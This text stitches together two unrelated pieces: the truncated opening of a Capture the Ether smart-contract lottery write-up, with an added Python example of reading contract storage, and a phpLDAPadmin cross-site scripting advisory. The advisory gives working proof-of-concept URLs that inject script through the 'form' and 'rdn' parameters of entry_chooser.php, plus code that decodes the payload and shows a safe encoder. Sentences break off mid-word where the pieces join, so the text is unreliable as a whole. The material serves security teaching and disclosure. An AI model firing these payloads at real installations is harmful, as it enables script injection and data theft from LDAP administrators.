Capture the Ether is a "Capture the Flag" style game in which you hack Ethereum smart contracts to learn about security.

Spoiler alert! In this write-up, I will go through the first four challenges in the category labeled "Lotteries". Each of these challenges has its own difficulty level and reward points. Basically, you can solve them by "guessing?" the right value of a variable in a given smart contract.

Guess the number

The smart contract for this challenge looks like this:

It has three functions:

- GuessTheNumberChallenge(): a payable constructor that tells you how much Ether is required when deploying the smart contract.
- isComplete(): returns true when the smart contract's balance is equal to 0.
- guess(uint8 n): takes a uint8 as an argument and compares it with the variable declared in line 4. If the numbers are equal, the contract sends Ether back to your address. Note that this function is payable and req...
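The reason the "guess" is in quotes: every state variable of a deployed contract sits in its storage, and any node will hand that storage back over JSON-RPC, so the value the challenge compares against can simply be read. The following is an added example, not code from the write-up or from Capture the Ether: it builds the eth_getStorageAt request, then decodes a 32-byte storage word using Solidity's layout rules (slot 0 first, small variables packed from the low-order byte upward in declaration order). The contract layout, the contract address and the slot contents used here are constructed for the demonstration and are not the challenge's actual values.

```python
"""Added example (not from the write-up): reading a "secret" state variable
from Ethereum contract storage.

Solidity stores state variables in 32-byte slots starting at slot 0 and packs
variables smaller than 32 bytes into one slot from the low-order byte upward,
in declaration order. The JSON-RPC method eth_getStorageAt returns the raw
word of any slot, so a value such as a challenge's answer is readable by
anyone whatever its visibility keyword. The layout and slot contents below
are constructed for the demonstration; they are not the challenge's values.
"""
import json
from typing import Any, Dict, Tuple


def storage_at_request(contract: str, slot: int, block: str = "latest",
                       req_id: int = 1) -> Dict[str, Any]:
    """Build the JSON-RPC body for eth_getStorageAt: params are the 0x-prefixed
    contract address, the slot number as hex, and the block tag."""
    return {"jsonrpc": "2.0", "id": req_id, "method": "eth_getStorageAt",
            "params": [contract, hex(slot), block]}


def storage_word(hex_word: str) -> bytes:
    """Parse the hex string returned by eth_getStorageAt into exactly 32 bytes
    (some clients strip leading zeros, so the word is left-padded)."""
    digits = hex_word[2:] if hex_word.startswith(("0x", "0X")) else hex_word
    if len(digits) % 2:
        digits = "0" + digits
    raw = bytes.fromhex(digits)
    if len(raw) > 32:
        raise ValueError("storage word longer than 32 bytes")
    return raw.rjust(32, b"\x00")


def read_packed(word: bytes, offset: int, size: int, signed: bool = False) -> int:
    """Extract the `size`-byte variable that Solidity placed `offset` bytes above
    the low-order end of the slot; interpret it as two's complement if `signed`."""
    if offset < 0 or size <= 0 or offset + size > 32:
        raise ValueError("variable does not fit in a 32-byte slot")
    value = (int.from_bytes(word, "big") >> (8 * offset)) & ((1 << (8 * size)) - 1)
    if signed and value >= 1 << (8 * size - 1):
        value -= 1 << (8 * size)
    return value


# Assumed layout of slot 0 for a contract declaring, in order:
#   uint8 answer; bool locked; uint16 counter; address owner;
# Each entry is (byte offset from the low end, size in bytes).
LAYOUT: Dict[str, Tuple[int, int]] = {
    "answer": (0, 1),
    "locked": (1, 1),
    "counter": (2, 2),
    "owner": (4, 20),
}

# Constructed eth_getStorageAt reply for that layout: answer = 0x13, locked = 1,
# counter = 0x0102, owner = 0xdead...beef, and 8 unused high-order bytes.
SAMPLE_SLOT0 = "0x" + "00" * 8 + "deadbeef" * 5 + "0102" + "01" + "13"


def decode_slot(hex_word: str, layout: Dict[str, Tuple[int, int]]) -> Dict[str, int]:
    """Decode every variable in `layout` from one storage word."""
    word = storage_word(hex_word)
    return {name: read_packed(word, off, size) for name, (off, size) in layout.items()}


if __name__ == "__main__":
    # Hypothetical contract address; send this body to any node's RPC endpoint.
    print(json.dumps(storage_at_request("0x" + "11" * 20, 0)))
    for name, value in decode_slot(SAMPLE_SLOT0, LAYOUT).items():
        print(f"{name}: {value:#x}")
```

For a contract whose only state variable is a uint8 at the top of the source, the whole answer is the low-order byte of slot 0, so `read_packed(word, 0, 1)` is all that is needed; the layout table is there for the general case where several small variables share a slot.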
Software Description

phpLDAPadmin is a web-based LDAP administration interface for viewing and manipulating LDAP information.

Vulnerability Description

The $request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php are not properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/JavaScript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage, as demonstrated in this PoC video.

Proof of Concept (PoC)

XSS via the 'form' parameter:

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test

XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%...
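The shape of the first payload tells you the injection context: the parameter value is echoed into an inline script, so the payload closes the surrounding string literal and call, runs alert(1), and then opens a dummy function so that the remainder of the original script still parses. The following is an added example, not code from the advisory or from phpLDAPadmin. Because entry_chooser.php is not reproduced in the advisory, TEMPLATE below is a hypothetical inline script standing in for the vulnerable page, shaped so the published payload parses the way the PoC implies; `opener.choose` and `pick` are made-up names. The example decodes the advisory's own PoC URL, shows with a small string-literal scanner that the raw value turns into executable code, and shows the encoding that keeps it inside the literal. (Note that the XSS Auditor the second PoC mentions was removed from Chrome in version 78, so that bypass requirement no longer applies to current browsers.)

```python
"""Added example (not from the advisory): how the published 'form' payload
escapes a JavaScript string literal, and an encoder that keeps it inside.

TEMPLATE is a hypothetical page fragment; the real entry_chooser.php markup
is not reproduced in the advisory.
"""
import json
import re
from urllib.parse import unquote_plus

# The advisory's first PoC URL, verbatim.
POC_URL = ("http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form"
           "%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test")

# Hypothetical page template: `form` lands inside a quoted string literal and
# `element` is used as a property name.
TEMPLATE = "function pick() {{ opener.choose({form_literal}).{element}; }}"

IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def query_param(url: str, name: str) -> str:
    """Return the percent-decoded value of `name` from the URL's query string,
    splitting on '&' only (older parse_qs also split on ';', which would
    truncate this payload)."""
    query = url.partition("?")[2]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    raise KeyError(name)


def js_string_literal(value: str) -> str:
    """Encode an untrusted value as a JavaScript string literal that is safe
    inside an HTML <script> block: JSON quoting handles quotes, backslashes and
    control characters (U+2028/U+2029 included, via ensure_ascii), and the extra
    replacements stop '</script>' or '<!--' from terminating the block."""
    literal = json.dumps(value, ensure_ascii=True)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def naive_embed(form: str, element: str) -> str:
    """The vulnerable pattern: concatenate the raw parameter into the script."""
    return TEMPLATE.format(form_literal="'" + form + "'", element=element)


def safe_embed(form: str, element: str) -> str:
    """The hardened pattern: encode the string value, and allow only a plain
    identifier where a property name is expected (encoding cannot help there)."""
    if not IDENT.fullmatch(element):
        raise ValueError("element must be a plain identifier")
    return TEMPLATE.format(form_literal=js_string_literal(form), element=element)


def code_outside_strings(js: str) -> str:
    """Minimal scanner that discards the contents of '...' and "..." literals
    (honouring backslash escapes) and returns what remains as code. It ignores
    comments, regex and template literals; it is only meant to show whether a
    parameter value broke out of its string literal."""
    out, quote, i = [], None, 0
    while i < len(js):
        c = js[i]
        if quote:
            if c == "\\":
                i += 2          # skip the escaped character
                continue
            if c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        else:
            out.append(c)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    payload = query_param(POC_URL, "form")
    print("raw payload:     ", payload)
    print("naive, as code:  ", code_outside_strings(naive_embed(payload, "base")))
    print("encoded, as code:", code_outside_strings(safe_embed(payload, "base")))
```

With the naive embedding the scanner's output contains `alert(1)` as code; with the encoded literal the only code left is the template itself. The same encoder applies to the 'rdn' parameter, and in PHP the equivalent is json_encode() with the JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_APOS and JSON_HEX_QUOT flags.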